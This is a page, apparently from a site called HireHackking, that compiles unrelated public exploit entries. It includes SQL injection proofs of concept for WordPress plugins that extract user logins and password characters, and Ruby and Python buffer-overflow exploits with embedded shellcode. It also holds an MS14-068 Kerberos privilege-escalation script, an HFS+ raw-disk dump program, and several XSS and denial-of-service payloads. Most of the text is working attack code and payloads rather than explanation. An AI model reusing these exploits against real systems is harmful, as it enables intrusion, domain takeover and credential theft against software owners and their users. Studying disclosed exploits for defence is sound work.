HireHackking

Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection Data : 2014 – 12 -03 Exploit Author : Securely (Yoo Hee man) Plugin : google-document-embedder Fixed version : N/A Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip 1. Detail - Google Document Embedder v2.5.14 have SQL Injection - This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection. - but mysql_real_escape_string() function is bypass possible - vulnerability file : /google-document-embedder/~view.php ================================================================ 50 // get profile 51 if ( isset( $_GET['gpid'] ) ) { 52 $gpid = mysql_real_escape_string( $_GET['gpid'] ); //mysql_real_escape_string() is bypass 53 if ( $profile = gde_get_profile( $gpid ) ) { 54 $tb = $profile['tb_flags']; 55 $vw = $profile['vw_flags']; 56 $bg = $profile['vw_bgcolor']; 57 $css = $profile['vw_css']; 58 } 59 } ================================================================ =============================================================== 373 function gde_get_profile( $id ) { 374 global $wpdb; 375 $table = $wpdb->prefix . 'gde_profiles'; 376 377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE profile_id = $id", ARRAY_A ); 378 $profile = unserialize($profile[0]['profile_data']); 379 380 if ( is_array($profile) ) { 381 return $profile; 382 } else { 383 return false; 384 } 385 } ================================================================ 2. POC http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1 3. Solution: Not patched 4. Discovered By : Securely(Yoo Hee man) God2zuzu@naver.com

#!/usr/bin/env ruby # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit # Date: Dec 03 2014 # Vulnerability Discovery: Gabor Seljan # Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com> # Software Link: http://www.bpftp.com/ # Version: 2010.75.0.76 # Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600] # CVE: CVE-2014-2973 # Notes: bypass stack size limitation for bigger payload. Allocate 2nd # shellcode in heap and copy back to stack. This exploit use egghunter # to locate 2nd shellcode in heap and copy to stack using memcpy function. # Offset seh = 93 filename = "xsession.bps" buff = "A" * 400 # ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby heap_sc = "w00tw00t" + "\xba\xaa\x8c\x8e\xda\xdb\xd3\xd9\x74\x24\xf4\x5f\x2b\xc9" + "\xb1\x44\x31\x57\x14\x83\xef\xfc\x03\x57\x10\x48\x79\x57" + "\x31\x17\x5b\x1c\xe2\xd3\x6d\x0f\x58\x6c\xbf\x66\xf9\x19" + "\xce\x48\x89\x6b\x3d\x22\xfb\x8f\xb6\x72\x0c\x24\xb6\x5a" + "\x87\x0c\x7f\xd4\x8f\x05\x8c\xb3\xae\x34\x8d\xa5\xd1\x3d" + "\x1e\x02\x36\xca\x9a\x76\xbd\x98\x0c\xff\xc0\xca\xc6\xb5" + "\xda\x81\x83\x69\xda\x7e\xd0\x5e\x95\x0b\x23\x14\x24\xe5" + "\x7d\xd5\x16\x39\x81\x85\xdd\x79\x0e\xd1\x1c\xb6\xe2\xdc" + "\x59\xa3\x09\xe5\x19\x17\xda\x6f\x03\xdc\x40\xb4\xc2\x09" + "\x12\x3f\xc8\x86\x50\x65\xcd\x19\x8c\x11\xe9\x92\x53\xce" + "\x7b\xe0\x77\x12\x1d\x2b\xc5\x22\xf4\x7f\xa3\xd6\x8f\xbd" + "\xdc\x96\xde\x4f\xf1\xf5\x36\xd0\xf6\x05\x39\x67\x4d\xfe" + "\x7d\x09\x96\x1c\xf2\x72\x3a\xc5\xa7\x94\xcd\xfa\xb7\x9b" + "\x5b\x41\x40\x0b\x30\x26\x70\x8a\xa0\x85\x42\x22\x55\x82" + "\xd7\x49\xf0\x20\x90\xf1\xde\xce\x29\xef\x49\x30\x7c\xeb" + "\xfc\x0c\x2f\x48\x56\x32\x9d\x12\x20\x2f\x3a\x38\xc7\x31" + "\xbd\x43\xe8\xda\x2e\xc3\x4f\x3b\xd9\x52\x17\x5e\x5b\xfc" + "\x9a\xc5\x28\x8f\x15\xdd\x47\x33\x72\xeb\xde\x28\x12\xb3" + "\xc0\x8e\xc3\x2b\x75\xe3\x47\xee\x1d\x8b\x2b\x81\xb4\x03" + "\xdb\x7d\x02\xab\x4b\x36\xe9\x27\xe0\xf7\x38\x3f\xb4\xd3" + "\xaa\xb6\xa4\x2d\x19\x9a\x75\x1f\xcf\xe5\xaa\xae\x2f\x49" + "\xb4\x84\xa7" # badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2' # only locate 1st heap address :P heap_addr = "\x50" + # push eax "\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh "\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777fh "\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx] "\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh "\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx] "\x8b\x1b" # mov ebx,dword ptr [ebx] egghunter = "\x8b\xd3\xeb\x05" + # mov edx,ebx # jmp $+7h "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e" + "\x3c\x05\x5a\x74\xef\xb8" + "\x77\x30\x30\x74" + # our tag 'w00t' "\x8b\xfa\xaf\x75\xea\xaf" + "\x75\xe7" memcpy_func = "\x58" + # pop eax # esp "\x81\xc4\x54\xf2\xff\xff" + # add esp,-3500 "\xb9\xef\xe6\x3b\xef" + # mov ecx,0xef3be6ef "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f "\x89\x08" + # mov [eax],ecx # memcpy() static address "\x89\xc1" + # mov ecx,eax "\x83\xc1\x10" + # add ecx,10h "\x89\x48\x04" + # mov [eax+4h],ecx # void *dest "\x89\x48\x08" + # mov [eax+8h],ecx # void *dest "\x89\x78\x0c" + # mov [eax+0ch],edi # const wchar_t *src (shellcode) "\xb9\x8d\x79\x77\x77" + # mov ecx,0x7777798d "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f "\x89\x48\x10" + # mov [eax+10h],ecx # size_t count "\x94\xc3" # xchg eax,esp # retn stack_sc = heap_addr + egghunter + memcpy_func # GetPC buff[1,2] = "\xd9\xeb" # fldpi buff[3,5] = "\x9b\xd9\x74\x24\xf4" # fstenv [esp-0xc] buff[8,1] = "\x58" # pop eax # pop esp into eax # FixRet stub buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45" # (1) buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr buff[30,stack_sc.size] = stack_sc # restore 1st shellcode buff[12,4] = buff[seh-24,4] # replace with original sc (1) buff[19,4] = buff[seh-4,4] # replace with original sc (2) buff[26,4] = buff[seh,4] # replace with original sc (3) buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166 buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null bps = "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" + "\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" + "\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" + "\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" + "\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" + "\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" + "\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" + buff + "\x0D\x0A\x61\x6E" + "\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" + "\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" + "\x0A" File.open(filename,"wb") do |fp| fp.write(bps) puts "Exploit file: #{filename} size: #{bps.size}" fp.close end

# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com> # Tested on: GNU/Linux - Debian Wheezy # Description: VFU v4.10-1.1 is prone to a stack-based buffer overflow # vulnerability because the application fails to perform adequate # boundary-checks on user-supplied input. # # An attacker can exploit this issue to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Vendor homepage: VFU v4.10-1.1 ( Latest version ) - http://cade.datamax.bg/vfu/ # Debian package: https://packages.debian.org/wheezy/vfu buffersize = 803 nopsled = "\x90" shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" eip = "\x10\xf0\xff\xbf" buffer = nopsled * (buffersize-len(shellcode)) + eip try: subprocess.call(["vfu -d", buffer]) except OSError as e: if e.errno == os.errno.ENOENT: print "VFU not found!" else: print "Error executing exploit" raise

source: https://www.securityfocus.com/bid/46861/info Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/list.php?path=[sqli]

source: https://www.securityfocus.com/bid/46861/info Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/categories.php?path=[sqli]

source: https://www.securityfocus.com/bid/46861/info Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/search.php?advCat=[sqli] http://www.example.com/search.php?advComp=[sqli]

source: https://www.securityfocus.com/bid/46861/info Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/rss/rss_news.php?lang=[sqli]

source: https://www.securityfocus.com/bid/46861/info Pixie is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/rss/rss_flash.php?lang=[sqli]

#!/usr/bin/python # MS14-068 Exploit # Author # ------ # Sylvain Monne # Contact : sylvain dot monne at solucom dot fr # http://twitter.com/bidord import sys, os from random import getrandbits from time import time, localtime, strftime from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5 from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \ decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \ AD_WIN2K_PAC from kek.pac import build_pac, pretty_print_pac from kek.util import epoch2gt, gt2epoch def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None): sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a) sys.stderr.flush() nonce = getrandbits(31) current_time = time() as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(as_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a) sys.stderr.flush() as_rep, as_rep_enc = decrypt_as_rep(data, user_key) session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue'])) logon_time = gt2epoch(str(as_rep_enc['authtime'])) tgt_a = as_rep['ticket'] sys.stderr.write(' Done!\n') if krbtgt_a_key is not None: print >> sys.sdterr, as_rep.prettyPrint() print >> sys.stderr, as_rep_enc.prettyPrint() ticket_debug(tgt_a, krbtgt_a_key) sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a) sys.stderr.flush() subkey = generate_subkey() nonce = getrandbits(31) current_time = time() pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time)) tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(tgs_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a) tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey) session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue'])) tgt_b = tgs_rep['ticket'] sys.stderr.write(' Done!\n') if trust_ab_key is not None: pretty_print_pac(pac[1]) print >> sys.stderr, tgs_rep.prettyPrint() print >> sys.stderr, tgs_rep_enc.prettyPrint() ticket_debug(tgt_b, trust_ab_key) if target_service is not None and target_host is not None and kdc_b is not None: sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b) sys.stderr.flush() subkey = generate_subkey() nonce = getrandbits(31) current_time = time() tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name, tgt_b, session_key2, subkey, nonce, current_time) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b) sys.stderr.flush() sock = send_req(tgs_req2, kdc_b) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b) tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey) sys.stderr.write(' Done!\n') else: tgs_rep2 = tgs_rep tgs_rep_enc2 = tgs_rep_enc sys.stderr.write(' [+] Creating ccache file %r...' % output_filename) cc = CCache((user_realm, user_name)) tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2) cc.add_credential(tgs_cred) cc.save(output_filename) sys.stderr.write(' Done!\n') if target_key is not None: print >> sys.stderr, tgs_rep2.prettyPrint() print >> sys.stderr, tgs_rep_enc2.prettyPrint() ticket_debug(tgs_rep2['ticket'], target_key) # Pretty print full ticket content # Only possible in a lab environment when you already know krbtgt and/or service keys def ticket_debug(ticket, key): try: ticket_enc = decrypt_ticket_enc_part(ticket, key) print >> sys.stderr, ticket.prettyPrint() for ad in iter_authorization_data(ticket_enc['authorization-data']): print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type'] if ad['ad-type'] == AD_WIN2K_PAC: pretty_print_pac(str(ad['ad-data'])) else: print >> sys.stderr, str(ad['ad-data']).encode('hex') except Exception as e: print 'ERROR:', e if __name__ == '__main__': from getopt import getopt from getpass import getpass def usage_and_exit(): print >> sys.stderr, 'USAGE:' print >> sys.stderr, '%s -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>' % sys.argv[0] print >> sys.stderr, '' print >> sys.stderr, 'OPTIONS:' print >> sys.stderr, ' -p <clearPassword>' print >> sys.stderr, ' --rc4 <ntlmHash>' sys.exit(1) opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4=']) opts = dict(opts) if not all(k in opts for k in ('-u', '-s', '-d')): usage_and_exit() user_name, user_realm = opts['-u'].split('@', 1) user_sid = opts['-s'] kdc_a = opts['-d'] if '--rc4' in opts: user_key = (RC4_HMAC, opts['--rc4'].decode('hex')) assert len(user_key[1]) == 16 elif '-p' in opts: user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest()) else: user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest()) target_realm = user_realm target_service = target_host = kdc_b = None filename = 'TGT_%s@%s.ccache' % (user_name, user_realm) user_realm = user_realm.upper() target_realm = target_realm.upper() sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)

source: https://www.securityfocus.com/bid/46904/info Rating-Widget is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Rating-Widget 1.3.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/rating-widget/view/rating.php?vars[type]=[xss] http://www.example.com/plugins/rating-widget/view/availability_options.php?selected_key=[xss] http://www.example.com/wp-content/plugins/rating-widget/view/save.php?rw_form_hidden_field_name=[xss]

source: https://www.securityfocus.com/bid/46902/info Sodahead Polls is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Sodahead Polls 2.0.2 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/sodahead-polls/poll.php?customize=%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/sodahead-polls/customizer.php?poll_id=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/46923/info MHonArc is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to consume all CPU resources, denying service to legitimate users. MHonArc versions 2.6.16 and prior are vulnerable. <bo<bo<bo<bo<body>dy>dy>dy>dy>

source: https://www.securityfocus.com/bid/46916/info XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. XOOPS 2.5.0 is vulnerable; other versions may also be affected. Parameter: module http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin&op=install&module=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe Parameter: module[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirm&module%5b%5d=1"><script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System [/REQUEST] Parameter: memberslist_id[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=users&selgroups=2 Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 94 memberslist_id%5b%5d="><script>alert(1)</script>&op=action_group&Submit=&selgroups=1&fct=mailusers&edit_group=add_group [/REQUEST] Parameter: newname[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System"><script>alert(1)</script> [/REQUEST] Parameter: oldname[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System"><script>alert(1)</script>1bf8581e3dc&fct=modulesadmin&newname%5b1%5d=System [/REQUEST]

source: https://www.securityfocus.com/bid/46961/info NewsPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. NewsPortal 0.37 is vulnerable; other versions may also be affected. http://www.example.com/post.php?newsgroups=<script>alert(28)</script>

source: https://www.securityfocus.com/bid/46932/info Web Poll Pro is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks. Web Poll Pro 1.0.3 is vulnerable; other versions may also be affected. <form action="http://host/poll/poll.php&page=edit" method="post" name="main"> <input type="hidden" name="poll" value="1"> <input type="hidden" name="error" value=&#039;description"><script>alert(document.cookie)</script>&#039;> </form> <script> document.main.submit(); </script>

source: https://www.securityfocus.com/bid/46960/info Online store php script is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. SQL Injection URIs: ==================== http://www.example.com/detail.php?prodid=[SQL] http://www.example.com/view_wishlist.php?products_id=[SQL] http://www.example.com/moreImage.php?prod_id=[SQL] http://www.example.com/product2.php?loginn=confirmed&a=&b=&submit=+++Login+++.... [empty Query ] http://www.example.com/products.php?cid=21&sid=558&skip=[SQL] http://www.example.com/gstatus.php?code=[SQL] Cross Site Scripting URIs: ========================== http://www.example.com/detail.php?prodid=<script>alert(1)</script> http://www.example.com/products.php?cid=21&sid=558&skip=<script>alert(1)</script>

source: https://www.securityfocus.com/bid/46962/info PluggedOut Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. PluggedOut Blog 1.9.9 is vulnerable; other versions may also be affected. http://www.example.com/index.php?year=<script>alert(88888)</script>

source: https://www.securityfocus.com/bid/46968/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Intl' extension. Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed. PHP versions prior to 5.3.6 are vulnerable. numfmt_set_symbol(numfmt_create("en", NumberFormatter::PATTERN_DECIMAL), 2147483648, "")

source: https://www.securityfocus.com/bid/46975/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension. Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed. Versions prior to PHP 5.3.6 are vulnerable. <?php $o = new ZipArchive(); if (! $o->open('test.zip',ZipArchive::CHECKCONS)) { exit ('error can\'t open'); } $o->getStream('file2'); // this file is ok echo "OK"; $r = $o->getStream('file1'); // this file has a wrong crc while (! feof($r)) { fread($r,1024); } echo "never here\n"; ?>

source: https://www.securityfocus.com/bid/46977/info PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension. Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition. Versions prior to PHP 5.3.6 are vulnerable. <?php $data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls"; $pass = "r23498rui324hjbnkj"; $maxi = 200000; $t = microtime(1); for ($i=0;$i<$maxi; $i++){ openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2'); } $t = microtime(1)-$t; print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n"; ?>

source: https://www.securityfocus.com/bid/46969/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension. Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed. Versions prior to PHP 5.3.6 are vulnerable. <?php $target_file = 'META-INF/MANIFEST.MF'; $za = new ZipArchive(); if ($za->open('test.jar') !== TRUE) { return FALSE; } if ($za->statName($target_file) !== FALSE) { $fd = $za->getStream($target_file); } else { $fd = FALSE; } $za->close(); if (is_resource($fd)) { echo strlen(stream_get_contents($fd)); } ?>

// source: https://www.securityfocus.com/bid/46982/info Apple Mac OS X is prone to a local information-disclosure vulnerability because of an integer-overflow error in the HFS subsystem. A local attacker can exploit this issue to obtain sensitive information that may lead to further attacks. Due to the nature of this issue, local attackers may be able to execute arbitrary code in the context of the kernel, but this has not been confirmed. Versions prior to OS X 10.6.7 are vulnerable. NOTE: This issue was previously discussed in BID 46950 (Apple Mac OS X Prior to 10.6.7 Multiple Security Vulnerabilities) but has been given its own record to better document it. /* * Apple HFS+ F_READBOOTSTRAP Information Disclosure * by Dan Rosenberg of Virtual Security Research, LLC * @djrbliss on twitter * * Usage: * $ gcc hfs-dump.c -o hfs-dump * $ ./hfs-dump [size] [outfile] * * ---- * * F_READBOOTSTRAP is an HFS+ fcntl designed to allow unprivileged callers to * retrieve the first 1024 bytes of the filesystem, which contains information * related to bootstrapping. * * However, due to an integer overflow in checking the requested range of * bytes, it is possible to retrieve arbitrary filesystem blocks, leading to an * information disclosure vulnerability. * * This issue was originally reported to Apple on July 1, 2010. The fix was a * single line long and took more than 8 months to release. No gold stars were * awarded. * */ #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> #include <sys/fcntl.h> #include <sys/mman.h> int main(int argc, char * argv[]) { int fd, outfd, ret; long num; unsigned char * buf; struct fbootstraptransfer arg; if(argc != 3) { printf("[*] Usage: %s [size] [outfile]\n", argv[0]); return -1; } num = atol(argv[1]); outfd = open(argv[2], O_RDWR | O_CREAT, 0644); if(outfd < 0) { printf("[*] Failed to open output file.\n"); return -1; } ftruncate(outfd, num); buf = (unsigned char *)mmap(NULL, num, PROT_READ | PROT_WRITE, MAP_SHARED, outfd, 0); if(buf == MAP_FAILED) { printf("[*] Not enough memory.\n"); return -1; } arg.fbt_buffer = buf; arg.fbt_offset = num * (-1); arg.fbt_length = num; fd = open("/", O_RDONLY); if(fd < 0) { printf("[*] Failed to open filesystem root.\n"); return -1; } ret = fcntl(fd, F_READBOOTSTRAP, &arg); if(ret < 0) { printf("[*] fcntl failed.\n"); return -1; } printf("[*] Successfully dumped %lu bytes to %s.\n", num, argv[2]); return 0; }

source: https://www.securityfocus.com/bid/46977/info PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension. Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition. Versions prior to PHP 5.3.6 are vulnerable. <?php $data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls"; $pass = "r23498rui324hjbnkj"; $maxi = 200000; $t = microtime(1); for ($i=0;$i<$maxi; $i++){ $cr = openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2'); $dcr = openssl_decrypt($cr, 'des3', $pass, false, '1qazxsw2'); if ($dcr != $data.$i){ print "at step $i decryption failed\n"; } } $t = microtime(1)-$t; print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n"; ?> fixes by add this code at line 4818 at the end of openssl_decrypt: EVP_CIPHER_CTX_cleanup(&cipher_ctx); ?>

# Exploit Title: Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection # Date: 29-10-2014 # Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek # Software Link: https://downloads.wordpress.org/plugin/cart66-lite.1.5.1.17.zip # Category: webapps 1. Description Cart66Ajax::shortcodeProductsTable() is accessible for every registered user. $postId is not escaped correctly (only html tags are stripped). File: cart66-lite\models\Cart66Ajax.php public static function shortcodeProductsTable() { global $wpdb; $prices = array(); $types = array(); $postId = Cart66Common::postVal('id'); $product = new Cart66Product(); $products = $product->getModels("where id=$postId", "order by name"); $data = array(); } http://security.szurek.pl/cart66-lite-wordpress-ecommerce-15117-blind-sql-injection.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register): <form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post"> <input type="hidden" name="action" value="shortcode_products_table"> Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- "> <input value="Hack" type="submit"> </form> This SQL will check if first password character user ID=1 is $. If yes, it will sleep 5 seconds. 3. Solution: Update to version 1.5.2 https://wordpress.org/plugins/cart66-lite/changelog/ https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip
